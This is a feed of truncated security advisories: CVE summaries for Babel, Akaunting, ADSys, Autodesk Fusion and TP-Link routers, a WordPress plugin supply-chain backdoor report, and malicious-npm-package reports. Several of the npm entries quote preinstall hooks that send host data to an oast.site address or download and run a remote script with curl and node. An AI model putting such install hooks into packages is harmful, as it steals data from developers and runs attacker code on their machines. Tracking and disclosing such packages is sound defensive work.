CVE-2026-49356
Babel is a compiler for writing next generation JavaScript. Prior to 8.0.0-rc.6 and 7.29.6, @babel/core is affected by an arbitrary file read via a sourceMappingURL comment. Using @babel/core to compile maliciously crafted code can allow an attacker to read any source map from the system that is...
CVE-2026-11994
Akaunting 3.1.21 contains an authenticated stored Cross-Site Scripting vulnerability in the report management workflow. A user with permission to create or update reports can store arbitrary HTML/JavaScript in the description field of a report...
CVE-2026-12249
An issue was discovered in Canonical ADSys upstream versions through v0.16.2. During Active Directory Certificate Services (AD CS) certificate auto-enrollment via the vendored Samba client script internal/policies/certificate/python/vendorsamba/gp/gpcertautoenrollext.py, ADSys utilizes a plaintext...
CVE-2026-10789
A maliciously crafted webpage, when visited by a user with Autodesk Fusion Desktop running and the MCP extension enabled, can trigger a vulnerability in the MCP extension that could allow arbitrary code execution. A successful exploit may allow code to execute with the privileges of the current...
CNAPP’s New Normal: Hyper-Prioritization and Autonomous Remediation at Cloud Scale
AI-powered detection has crossed a threshold. Security teams can now surface vulnerabilities, misconfigurations, and active attack paths at a speed and scale that was unimaginable a few years ago. The problem is no longer finding or knowing risk; it’s closing it fast enough to matter. Cloud...
ShapedPlugin WordPress Pro Plugins Backdoored in Supply Chain Attack
Multiple WordPress plugins from ShapedPlugin were compromised in a supply chain attack after unknown threat actors managed to tamper with the official release channels and push backdoor code. "Attackers compromised the vendor's build and distribution pipeline, injecting backdoor code into Pro...
CVE-2026-11834
A command injection vulnerability has been identified in the DHCP option processing logic in multiple TP-Link router models, due to insufficient validation of externally supplied DHCP option data. An adjacent attacker may exploit this vulnerability by supplying crafted DHCP responses, potentially...
EUVD-2026-38339
A command injection vulnerability has been identified in the DHCP option processing logic in multiple TP-Link router models, due to insufficient validation of externally supplied DHCP option data. An adjacent attacker may exploit this vulnerability by supplying crafted DHCP responses, potentially...
CVE-2026-11834 Unauthenticated Command Injection via DHCP Option Handling in Multiple TP-Link Routers
A command injection vulnerability has been identified in the DHCP option processing logic in multiple TP-Link router models, due to insufficient validation of externally supplied DHCP option data. An adjacent attacker may exploit this vulnerability by supplying crafted DHCP responses, potentially...
CVE-2026-11834
CVE-2026-11834 describes a command-injection vulnerability in the DHCP option processing logic of multiple TP-Link routers, caused by insufficient validation of externally supplied DHCP option data. An adjacent attacker can exploit this by sending crafted DHCP responses, potentially during device...
Malicious code in zomato-mcp (npm)
Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e. On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...
Malicious code in zomato-espresso (npm)
Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d. Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...
MAL-2026-6269 Malicious code in zomato-espresso (npm)
Source: amazon-inspector 860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d. Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every npm...
MAL-2026-6270 Malicious code in zomato-mcp (npm)
Source: amazon-inspector a23c3c63a9064636250be7dffa3781af0f9cdfcfd11a8da875be470c6952033e. On npm install, the package's preinstall lifecycle script runs curl against http://d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site/install/ carrying the...
Malicious code in zomato-core (npm)
Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5. package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...
MAL-2026-6268 Malicious code in zomato-core (npm)
Source: amazon-inspector d5042b2ca8b8b3ba1f073344762615dc532864913af3f54a16540d44dde97ba5. package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami output, current working directory, and the...
Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261. package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...
MAL-2026-6265 Malicious code in sn-internal-testjgsakjdkjadkjah (npm)
Source: amazon-inspector fd1a751946e8be92bbd0b675c57b3389e1e54919a69f5f6fef414a16cc2f1261. package.json declares a preinstall lifecycle script that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js. On npm install, th...
Malicious code in test-package-sajsdkashdj (npm)
Source: amazon-inspector 62645375d713992c0b37f646ed3cf898e0ea2b56777ca1b531b3d6ee61d93b87. package.json declares a preinstall lifecycle script: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js". On every npm install, the...